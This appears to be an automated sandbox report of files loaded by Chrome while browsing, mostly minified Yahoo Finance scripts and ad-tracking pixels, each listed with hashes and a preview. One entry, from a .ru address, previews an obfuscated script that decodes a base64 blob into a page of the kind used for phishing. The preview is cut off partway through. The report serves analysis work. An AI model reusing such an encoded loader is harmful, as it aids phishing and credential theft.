                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2EED42C1D760567B6C8CB85EF023D62D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EBE317FDD0C2040297866E9318FE905496B35C9F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:592D78C718BB5B0240F9217E5C4D7658210EDC758BC3DB17762823A065462B8B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BD3947F182ED3B8A9C4A918DEF82387EA553016F72DBBB17E0B2A3B09C6CB54427EAAF394D9ECFDA4BAC18B19FCFCB391B803C3A219DC7D8518417DD698222EC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uc/finance/cosaic/js/common-bff47d4d.afd9cf2cc048f5011dfe.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-bff47d4d.afd9cf2cc048f5011dfe.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[194],{1235:(t,e,i)=>{var s=i(4603);i(8978);(t=>{var e=void 0!==s.mE?s.mE:t.CIQ;e.ChartEngine.prototype.pointerEvents={down:[],up:[]},e.ChartEngine.prototype.manageTouchAndMouse=!0,e.ChartEngine.prototype.registerTouchAndMouseEvents=function(){if(!this.touchAndMouseEventsRegistered){this.touchAndMouseEventsRegistered=!0;var t=this.controls.chartControls||document,i=t.querySelector(".stx-zoom-in"),s=t.querySelector(".stx-zoom-out"),n=this.chart.container,a=this,r=function(t,e,i){a.addDomEventListener(n,t,(function(t){a.mainSeriesRenderer.nonInteractive||e(t)}),i)};e.touchDevice?e.isSurface?(r("mousemove",(function(t){a.msMouseMoveProxy(t)})),r("mouseenter",(function(t){a.msMouseMoveProxy(t)})),r("mousedown",(function(t){a.msMouseDownProxy(t)})),r("mouseup",(function(t){a.msMouseUpProxy(t)})),r("
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (6193), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):16894
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.892811366494817
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:EWNWYKoJ3udngct5hvWNWYKoJ3udng4qrduTQfrpqrduTQfrO:rAdMUT4AdMUMlrElrO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:5928AAB8CA4D5EE5A2544A7FF389B85C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D741BB635BB176348099E8192158DF01B5913ED4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:40E8AEA7579560CDB2C44C8351DF2DD0F0BE4D0A868975D1073F66701D5670AB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C80F97883F38CA42A627871A8CF11570EEF1B2DE01255523DC6A3940C8CADE1F531D92DA07BEA4A75BEFF83F178A854567C7F3C10069469768417A86B41A2980
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://hfj.rontishet.ru/iCaWzj6Q/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<script>..if("https://HFj.rontishet.ru/iCaWzj6Q/" == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCjwhLS0gPGRpdj5UaGUgb25seSBwbGFjZSB3aGVyZSBzdWNjZXNzIGNvbWVzIGJlZm9yZSB3b3JrIGlzIGluIHRoZSBkaWN0aW9uYXJ5LjwvZGl2PiAtLT4KICAgIDxzY3JpcHQgc3JjPSJodHRwczovL2NvZGUuanF1ZXJ5LmNvbS9qcXVlcnktMy42LjAubWluLmpzIj48L3NjcmlwdD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jaGFsbGVuZ2VzLmNsb3VkZmxhcmUuY29tL3R1cm5zdGlsZS92MC9hcGkuanM/cmVuZGVyPWV4cGxpY2l0Ij48L3NjcmlwdD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jZG5qcy5jbG91ZGZsYXJlLmNvbS9hamF4L2xpYnMvY3J5cHRvLWpzLzQuMS4xL2NyeXB0by1qcy5taW4uanMiPjwvc2NyaXB0Pg0KICAgIDxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9RWRnZSxjaHJvbWU9MSI+DQogICAgPG1ldGEgbmFtZT0icm9ib3RzIiBjb250ZW50PSJub2luZGV4LCBub2ZvbGxvdyI+DQogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPg0KICAgIDx0aXRsZT4mIzgyMDM7PC90aXRsZT4NCiAgICA8c3R5bGU+DQpib2R5IHsNCiAgYmFja2dyb3VuZC1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (2733)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2734
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.319317305303091
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:wyeg4KP0/klhQUXouFGsQt3Go7hTilGoYmhwK1M6HnsSpH48XUQ+5Cz:we0MlhQUX1cX3Go7hGlGoHwoMAsSpH4s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C63B49DC27EB6FACE2968AE0455781DA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:29E0E4205C071F70855753A59A1E242849688968
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1A8D85E707F871C06435E7A8F3AAEEF3583830D06FAC77EC8D8D37CA2B13AD31
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:42C771DFD97941831CC6EA01ADF44117F3C9335C818559F55BD2AB03C1AFE1A5CFC72F87B9CDA73D9F8FE581927BF692B1EE9D538765938BCEF01AFF00F37640
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as j,p as d,k as u,i as f,y as w,c as A,b as G,j as B,u as H,g as J,a as M,e as S,d as N,f as D,q as I,n as L,F as O,G as P,v as Q}from"./scheduler.Dsuh-FKt.js";import{S as R,i as T,t as m,g as U,a as k,e as W}from"./index.CvwOawEI.js";import{g as X,e as Y}from"./commonUtil.BWwawKjd.js";import{i as Z}from"./intersectUtil.DVqOQxux.js";import{a as x}from"./43.BgWy8GOF.js";import{g as $,r as v}from"./headerUtil.DzYOGaFq.js";const ee=r=>({loading:r&1,Component:r&32,value:r&16,hasError:r&8}),z=r=>({loading:r[0],Component:r[5],value:r[4],hasError:r[3]});function C(r){let t,i,e=r[0]&&E(r);const l=r[10].default,s=A(l,r,r[9],z);return{c(){e&&e.c(),t=G(),s&&s.c()},l(o){e&&e.l(o),t=B(o),s&&s.l(o)},m(o,n){e&&e.m(o,n),u(o,t,n),s&&s.m(o,n),i=!0},p(o,n){o[0]?e?e.p(o,n):(e=E(o),e.c(),e.m(t.parentNode,t)):e&&(e.d(1),e=null),s&&s.p&&(!i||n&569)&&H(s,l,o,o[9],i?M(l,o[9],n,ee):J(o[9]),z)},i(o){i||(m(s,o),i=!0)},o(o){k(s,o),i=!1},d(o){o&&f(t),e&&e.d(o),s&&s.d(o)}}}function E(r){let t;function i(s,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:C source, ASCII text, with very long lines (19845)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):19939
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.73252636335448
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:YnIneIVlVqlVHwTVJvHIHmo/zYyPQEHvVPnWtP5gTSLkT1G8pBI+:YnIneIHVCVMFq/zvfHNPWtPCTskT9pBR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:211E980C0F2354CDAC9669B14EF4D46A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D4DD086AF2C7094E73A4973E354ACD634668FFCE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:60D8A481E2A8250276904D8D120929313843F8A69646B981B4114BE928023438
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:66B504AC35EF0659BDC0B982610F0508379D2CA10E56530729EBF9DE3D201FA246C13AB7D6930F352B520BCA9265537C3EDCC4739B69C75EC325B0F3FA2A971E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uc/finance/cosaic/js/common-7db6e8e4.1529d1be95c4d4d658f3.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-7db6e8e4.1529d1be95c4d4d658f3.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[6516],{8602:(e,r,a)=>{a.d(r,{A:()=>f}),function(){const e=Object.defineProperties({domains:["^127\\.0\\.0\\.1$","^(?:.+\\.)?localhost$","^(?:.+\\.)?yahoo\\.com$","^(?:.+\\.)?localhost$","^127\\.0\\.0\\.1$"],filesystem:!0,licenseExpiration:"2025/06/27",trialExpiration:void 0,version:"9.0.0"},{daysUntilExpired:{get:function(){return Math.round((this.expirationDate-new Date)/864e5)}},expirationDate:{get:function(){return new Date(this.licenseExpiration||this.trialExpiration)}},gracePeriodDate:{get:function(){const e=new Date(this.expirationDate);return this.isTrial||e.setDate(e.getDate()+30),e}},isDateLocked:{get:function(){return this.licenseExpiration||this.trialExpiration}},isDomainLocked:{get:function(){return this.domains&&this.domains.length>0}},isFileSystemLocked:{get:function(){return voi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):246
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.840548885243462
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:JSx/FWYTrZLiLb8yXXfQzTsh4H84vrLOAOvxK/Q/ys6vlyXbYzTsh4tAisaBfFE2:OsIrZrlUh4vflKf16vlRUh4hB1v
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6501F17F68B52B1C7D8834366E4FB0B7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:76A82A2FD7CE496CE61EBEA76773F136543ACFDB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:173F8FE08C46867A95E2B607E526B91CAE9518D83F78F6BAD10CD50C888D59A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:24F080C0D22891C3FBA357B767BC333E69A0BBD751C498DD73B32105E038A286B3B3C833DD8A32A03D649AEF00C6DE1A4FE7A17F2EA26B26292AF091634C0EE4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/toast.DmgsWY65.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{c as s}from"./commonUtil.BWwawKjd.js";async function e(o,t){const[a]=await s(["toast"],o),n=t.id||String(Date.now());a.createToast({...t,id:n})}async function i(o,t){const[a]=await s(["toast"],o);a.removeToast(t.id)}export{e as a,i as r};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (10456)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):10550
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.244183326950915
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:8oo1Fjga+6rDV+rDpXnlbRVy7Su8a3f16eVqYB:O1F0L6rDV6pXnlbRVy7F3FqYB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0B9D70A277316126CF302E49197921F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F120FAE96AF8C404EAA76C28FA14BB79D9FF2A10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0926857EE0B388BA6FF0A6E66DB6E5D7BE91DB954B7431B7F71F22BB70525BFB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A231B4292B4B25A9C31C07013BF1ED6EDA7319AA52B50050A0BA6227543E2083552546A607FEAEDCC4FEF6EC90A9592ADA909A017207765A0AE54C31B146F4EF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-756fe656.101e53643287a2b69051.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[4189],{7816:(t,e,s)=>{s.d(e,{A:()=>f});var i=s(1662),n=s(4603),o=s(714),r=s(6215),a=s(9261),c=s(1108),l=s(8602);if(2346!=s.j)var h=s(7256);var u=s(4490);function d(t,e){var s=Object.keys(t);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(t);e&&(i=i.filter((function(e){return Object.getOwnPropertyDescriptor(t,e).enumerable}))),s.push.apply(s,i)}return s}function m(t){for(var e=1;e<arguments.length;e++){var s=null!=arguments[e]?arguments[e]:{};e%2?d(Object(s),!0).forEach((function(e){p(t,e,s[e])})):Object.getOwnPropertyDescriptors?Object.defineProperties(t,Object.getOwnPropertyDescriptors(s)):d(Object(s)).forEach((function(e){Object.defineProperty(t,e,Object.getOwnPropertyDescriptor(s,e))}))}return t}function p(t,e,s){return(e=function(t){var e=function(t,e){if("object"!=type
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):893
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.326736316609113
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:8mBR4g/Nr5LBRHNr5CTzvNr50d3UKNr5ChINr5z:pBFldBT6ccmZ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:884D1B28597E70C70152032FA791F137
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:80625894268E46FFB6F7096ACEA9795901DBFECD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:70399B6B4DF2E80E984AC8C732AE365EFDEB63881E6290DFC17EE35086673AB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AC4BEB81F231684C42BD230F367F99A23CE16C02E2C7575F50CF8B1BBB843DBB08B43A006F1DDACE224448445762A7115B90E961E7F744BFA253D0C0FD7241AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://ads.yieldmo.com/pbcas?us_privacy=1YNN&gdpr=0&gdpr_consent=&type=iframe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<html>.<body>.<img src="https://cm.g.doubleclick.net/pixel?google_nid=yieldmo_dbm&google_hm=VlJMQW9MTF9fdUwxZXd5SWE1SXE=" style="display: none;" border="0" height="1" width="1">.<img src="https://cm.g.doubleclick.net/pixel?google_nid=yieldmo_dbm&google_cm&pn_id=c" style="display: none;" border="0" height="1" width="1">.<img src="https://pixel.tapad.com/idsync/ex/receive?partner_id=3107&partner_device_id=VRLAoLL__uL1ewyIa5Iq" style="display: none;" border="0" height="1" width="1">.<img src="https://bh.contextweb.com/bh/rtset?pid=561118&ev=1&rurl=https%3a%2f%2fads.yieldmo.com/v000/sync?userid=%%VGUID%%&pn_id=pp&gdpr=0&gdpr_consent=&gpp=&gpp_sid=&us_privacy=" style="display: none;" border="0" height="1" width="1">.<img src="https://bttrack.com/pixel/cookiesync?source=6f15a88d-e42c-4017-8276-dff2b21d7926&secure=1" style="display: none;" border="0" height="1" width="1">.</body>.</html>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:MS Windows icon resource - 1 icon, 32x32, 8 bits/pixel
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2238
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.20822051335051
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:susqeZyNQIfmwJ0osmoRvA+SNOFjTLpUdq9nQbAz6jB5UekYpXLimkBbKsVEtotx:survfwvpRUdq9nQjkYAJbK9tmq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3A07174943F82046370997254100D870
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:ECB1E2E89AF0EC6F45F875C22DF0FBD45821BA80
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C6F7EE2CADAE2E121342A8C4245141175BFE887776206DEB17149D46CF3AA827
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:0A589E20251F62F02C4B96B916FBD9359677A26379D46EEEF4E455464643DE0C9AEEF921AD563D970E7436805DD18AE974DE6942DFDF0C65089512D8A3B2FD35
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:...... ..............(... ...@.................................`...a...a...b...c...d...e...f...g...h...i...j...k...l...p...r.. s..$v..)y..+z...|..0}..6...9...;...A...K...L...P...R...T...X...Y...\...k...l...o...p...x...y...~.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (3121)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3122
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.459156014316713
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:wb0w7/mFB9KAa6ucsX9v59p5VWTEXeKYfoI:wbBjyaAa6ktv59BaEXeKsoI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:75E1972C3A8D223FF478C7B4737E2149
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:55909427FB5451916924F2E22B47BAA49C871895
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:29FF7BFBB8CBBC633D26B983BFDD4494C3FDD2529C50F24A48EE678A5F7D6D5C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E3D1C43562049C7D8D2A64797C735F8808BC862131DE3A97D77E928B26F846ADDC35E99AD664FE81A93D4AB6B47EBF86EBCCDC2EA6BDD56A2C275118AC46866D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as U,p as q,k as b,i as d,e as G,d as W,q as n,O as N,C as m,a6 as B,G as E,n as w,c as F,u as M,g as O,a as Y}from"./scheduler.Dsuh-FKt.js";import{S as j,i as z,g as J,a as g,e as K,t as h}from"./index.CvwOawEI.js";const Q=r=>({}),C=r=>({});function V(r){let e,t,a,l,c,f;return{c(){e=G("img"),this.h()},l(o){e=W(o,"IMG",{class:!0,alt:!0,src:!0,srcset:!0,sizes:!0,fetchpriority:!0,loading:!0}),this.h()},h(){n(e,"class",t=N(`tw-bg-opacity-25 ${r[4]}`)+" yf-13q9uv1"),n(e,"alt",r[3]),m(e.src,a=r[1])||n(e,"src",a),B(e,l=r[2])||n(e,"srcset",l),n(e,"sizes",r[8]),n(e,"fetchpriority",r[6]),n(e,"loading",r[0])},m(o,s){b(o,e,s),c||(f=E(e,"error",r[13]),c=!0)},p(o,s){s&16&&t!==(t=N(`tw-bg-opacity-25 ${o[4]}`)+" yf-13q9uv1")&&n(e,"class",t),s&8&&n(e,"alt",o[3]),s&2&&!m(e.src,a=o[1])&&n(e,"src",a),s&4&&l!==(l=o[2])&&n(e,"srcset",l),s&256&&n(e,"sizes",o[8]),s&64&&n(e,"fetchpriority",o[6]),s&1&&n(e,"loading",o[0])},i:w,o:w,d(o){o&&d(e),c=!1,f()}}}function v(r){let e;const t=r[12].fallback,a=F(t
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.256306466575051
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:IU7waifM+pFAk5waifMKY:NwpM+nB5wpMKY
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:631538D4008D6F842DEA6C1086EF1735
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BF7FB2B016029213CCDD07022389F9378D964078
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5E533CDA6C462E7A158E2E2F371649BA7A970140BCF957976DD72C1CA73FB0D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:CE48F607DF4FED664015B63A5A6D674AF0D9B26C022B6A0B421C02A576E13AA9E050B0D31466CD6859FFA09E137CF9CC34BE0FC7C28898B807DF1F2C5F56A9E3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://pa.ybp.yahoo.com/.well-known/interest-group/permissions/?origin=https%3A%2F%2Fgps-aa.ybp.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{. "joinAdInterestGroup": true,. "leaveAdInterestGroup": true.}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1419), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1419
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.290554482292794
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:Zdg3kOvVQnbrMlx9w8l9fRWl5Yl7ifkugr/zeuWFB97rb3BeuQcgkzozogkMH6KX:ZULtQPExll9fwl5YJGkn/iuCfrb3p5gv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:5043A481C515B36358C32B8EA2D581FE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:62F528373DD9070C4EC46F5FD53C75BEBF33C985
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:77D1A2D51CE7CD15E6B10DECCC9D34C6BBFB316352F9B3896003DD007B66A920
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:787A6FFDC12314DE3E2E6BCAAB924E5C4D505F526EDAE3C48E9AC384466C272312BE57B3B9FA57856A8348F68A15B17495AF289E5277EBE3884B788AD11E1E77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/fp/js/react-wafer-games.custom.modern.5043a481c515b36358c32b8ea2d581fe.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const LOCAL_STORAGE_VARIABLE_NAME="ngyRecentlyPlayedGames",MAX_AMOUNT_OF_GAMES_IN_RECENTLY_PLAYED=2,cleanPath=e=>e.replace("/games/play/","").replace(/\/$/,""),idHeyYahoo="hey yahoo",init=()=>{const{wafer:e}=window,{localStorage:t}=e.features;let a=null;function n(t){let a,n,l;t[0]&&(a=t[0].path,l=`${a}`),t[1]&&(n=t[1].path,l=`${a},${n}`),e.state={recentlyPlayedGames:l,recentlyPlayedGamesUpdateTime:Date.now()}}(()=>{if(a=document.getElementsByClassName("react-wafer-games")[0],a){let l,i=!1;if(t&&(window.wafer.utils.bindEvent(a,"click",(e=>{const{target:a}=e,l=a.getAttribute("data-id");let i=a.getAttribute("data-path");if(l&&i){if(l.toLowerCase()===idHeyYahoo)return;i=cleanPath(i);const e={id:l,path:i};!function(e,a){if(!t)return;let l;e?(l=JSON.parse(e),l=l.filter((e=>e.id!==a.id)),l.length>=2&&l.splice(1),l.unshift(a)):l=[a];window.localStorage.setItem("ngyRecentlyPlayedGames",JSON.stringify(l)),n(l)}(window.localStorage.getItem("ngyRecentlyPlayedGames"),e)}}),{passive:!0}),l=window.l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (8982)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):9090
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.399039673331103
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:cAZPi+85zQyFkdsWQ/EpW4KXyspsKL+KSTyG6owDo:zn85mdPQ+cL+KSuxo5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:AD229D2B9CFD74C3C58298D6025C592E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8FCFB4DDE04C050496FF5477B380004E74437B95
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B10311E9C4B8AD8CB66757588398FF148450519836F24044E8F39F0B4F56F090
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:44247CE72B15C27E7FD123F14EEC33AF87ED7CE2A9E2F3738B6536C38FBF49AE82F86187DF68278BDDB8C382C5E919D341FE09F56B26EDE65FC29965DC681368
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
